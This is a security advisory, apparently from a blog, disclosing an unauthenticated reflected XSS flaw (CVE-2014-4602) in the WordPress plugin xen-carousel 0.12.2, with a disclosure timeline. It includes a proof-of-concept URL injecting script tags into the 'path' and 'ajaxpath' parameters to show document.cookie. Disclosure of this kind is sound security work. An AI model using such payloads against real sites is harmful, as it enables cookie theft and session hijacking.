wp-plugin : xen-carousel – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : xen-carousel

 

Effected Version : 0.12.2 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/xen-carousel/xencarousel-admin.js.php?path=path’><script>alert(document.cookie)</script>&ajaxpath=ajaxpath’><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : path, ajaxpath

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4602

 
Plugin Description :
 
**The balance of form and function.**

Call out sections of your site by easily creating a carousel of images, associated to posts or pages, for display on your home page or anywhere on your site. The carousel purposely does not come styled, but is instead semantically marked up with #IDs and .classes to make it easy for you to integrate it into your theme without much effort.

Leave a Reply

Your email address will not be published. Required fields are marked *